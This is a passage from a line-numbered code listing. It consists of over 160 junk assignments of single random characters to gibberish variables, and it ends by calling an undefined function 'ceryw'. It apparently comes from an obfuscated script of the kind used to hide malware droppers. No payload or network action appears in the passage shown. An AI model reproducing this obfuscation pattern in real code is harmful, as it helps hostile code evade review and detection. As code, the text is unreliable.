1558 | zehiferzx = "Z"; | |
1559 | zehiferzx = "x"; | |
1560 | jejasrgr = "x"; | |
1561 | jejasrgr = "U"; | |
1562 | jejasrgr = "I"; | |
1563 | jejasrgr = "f"; | |
1564 | jejasrgr = "K"; | |
1565 | jejasrgr = "v"; | |
1566 | jejasrgr = "u"; | |
1567 | jejasrgr = "G"; | |
1568 | jejasrgr = "C"; | |
1569 | jejasrgr = "q"; | |
1570 | jejasrgr = "L"; | |
1571 | jejasrgr = "c"; | |
1572 | jejasrgr = "W"; | |
1573 | jejasrgr = "o"; | |
1574 | jejasrgr = "m"; | |
1575 | jejasrgr = "w"; | |
1576 | jejasrgr = "l"; | |
1577 | jejasrgr = "d"; | |
1578 | jejasrgr = "b"; | |
1579 | jejasrgr = "O"; | |
1580 | jejasrgr = "J"; | |
1581 | jejasrgr = "j"; | |
1582 | jejasrgr = "m"; | |
1583 | jejasrgr = "f"; | |
1584 | jejasrgr = "u"; | |
1585 | jejasrgr = "G"; | |
1586 | jejasrgr = "c"; | |
1587 | jejasrgr = "A"; | |
1588 | jejasrgr = "R"; | |
1589 | jejasrgr = "V"; | |
1590 | jejasrgr = "u"; | |
1591 | jejasrgr = "K"; | |
1592 | jejasrgr = "H"; | |
1593 | jejasrgr = "E"; | |
1594 | jejasrgr = "&"; | |
1595 | vwjheq = "e"; | |
1596 | vwjheq = "t"; | |
1597 | vwjheq = "e"; | |
1598 | vwjheq = "o"; | |
1599 | vwjheq = "O"; | |
1600 | vwjheq = "L"; | |
1601 | vwjheq = "b"; | |
1602 | vwjheq = "l"; | |
1603 | vwjheq = "T"; | |
1604 | vwjheq = "q"; | |
1605 | vwjheq = "N"; | |
1606 | vwjheq = "i"; | |
1607 | vwjheq = "S"; | |
1608 | vwjheq = "Q"; | |
1609 | vwjheq = "e"; | |
1610 | vwjheq = "o"; | |
1611 | vwjheq = "C"; | |
1612 | vwjheq = "g"; | |
1613 | vwjheq = "N"; | |
1614 | vwjheq = "n"; | |
1615 | vwjheq = "y"; | |
1616 | vwjheq = "g"; | |
1617 | vwjheq = "w"; | |
1618 | vwjheq = "P"; | |
1619 | vwjheq = "o"; | |
1620 | vwjheq = "o"; | |
1621 | vwjheq = "O"; | |
1622 | vwjheq = "h"; | |
1623 | vwjheq = "r"; | |
1624 | vwjheq = "v"; | |
1625 | vwjheq = "h"; | |
1626 | vwjheq = "U"; | |
1627 | vwjheq = "p"; | |
1628 | vwjheq = "g"; | |
1629 | vwjheq = "B"; | |
1630 | vwjheq = "Z"; | |
1631 | vwjheq = "L"; | |
1632 | vwjheq = "T"; | |
1633 | qwbvvcc = "q"; | |
1634 | qwbvvcc = "c"; | |
1635 | qwbvvcc = "f"; | |
1636 | qwbvvcc = "P"; | |
1637 | qwbvvcc = "G"; | |
1638 | qwbvvcc = "w"; | |
1639 | qwbvvcc = "P"; | |
1640 | qwbvvcc = "A"; | |
1641 | qwbvvcc = "j"; | |
1642 | qwbvvcc = "J"; | |
1643 | qwbvvcc = "P"; | |
1644 | qwbvvcc = "p"; | |
1645 | qwbvvcc = "J"; | |
1646 | qwbvvcc = "p"; | |
1647 | qwbvvcc = "j"; | |
1648 | qwbvvcc = "v"; | |
1649 | qwbvvcc = "C"; | |
1650 | qwbvvcc = "c"; | |
1651 | qwbvvcc = "S"; | |
1652 | qwbvvcc = "k"; | |
1653 | qwbvvcc = "a"; | |
1654 | qwbvvcc = "k"; | |
1655 | qwbvvcc = "H"; | |
1656 | qwbvvcc = "q"; | |
1657 | qwbvvcc = "j"; | |
1658 | qwbvvcc = "L"; | |
1659 | qwbvvcc = "G"; | |
1660 | qwbvvcc = " "; | |
1661 | rxfyg = "x"; | |
1662 | rxfyg = "Y"; | |
1663 | rxfyg = "Q"; | |
1664 | rxfyg = "D"; | |
1665 | rxfyg = "D"; | |
1666 | rxfyg = "h"; | |
1667 | rxfyg = "q"; | |
1668 | rxfyg = "J"; | |
1669 | rxfyg = "g"; | |
1670 | rxfyg = "q"; | |
1671 | rxfyg = "G"; | |
1672 | rxfyg = "t"; | |
1673 | rxfyg = "D"; | |
1674 | rxfyg = "s"; | |
1675 | rxfyg = "J"; | |
1676 | rxfyg = "o"; | |
1677 | rxfyg = "d"; | |
1678 | rxfyg = "Z"; | |
1679 | rxfyg = "W"; | |
1680 | rxfyg = "E"; | |
1681 | rxfyg = "I"; | |
1682 | rxfyg = "c"; | |
1683 | rxfyg = "o"; | |
1684 | rxfyg = "L"; | |
1685 | rxfyg = "m"; | |
1686 | rxfyg = "a"; | |
1687 | rxfyg = "t"; | |
1688 | rxfyg = "P"; | |
1689 | rxfyg = "p"; | |
1690 | rxfyg = "H"; | |
1691 | rxfyg = "J"; | |
1692 | rxfyg = "T"; | |
1693 | rxfyg = "M"; | |
1694 | rxfyg = "f"; | |
1695 | rxfyg = "v"; | |
1696 | rxfyg = "@"; | |
1697 | xmbwzvqxv = "B"; | |
1698 | xmbwzvqxv = "y"; | |
1699 | xmbwzvqxv = "T"; | |
1700 | xmbwzvqxv = "h"; | |
1701 | xmbwzvqxv = "c"; | |
1702 | xmbwzvqxv = "G"; | |
1703 | xmbwzvqxv = "Z"; | |
1704 | xmbwzvqxv = "y"; | |
1705 | xmbwzvqxv = "Z"; | |
1706 | xmbwzvqxv = "X"; | |
1707 | xmbwzvqxv = "w"; | |
1708 | xmbwzvqxv = "x"; | |
1709 | xmbwzvqxv = "H"; | |
1710 | xmbwzvqxv = "i"; | |
1711 | xmbwzvqxv = "G"; | |
1712 | xmbwzvqxv = "Z"; | |
1713 | xmbwzvqxv = "m"; | |
1714 | xmbwzvqxv = "e"; | |
1715 | xmbwzvqxv = "O"; | |
1716 | xmbwzvqxv = "d"; | |
1717 | xmbwzvqxv = "x"; | |
1718 | xmbwzvqxv = "f"; | |
1719 | xmbwzvqxv = "Y"; | |
1720 | ceryw ( ); |
|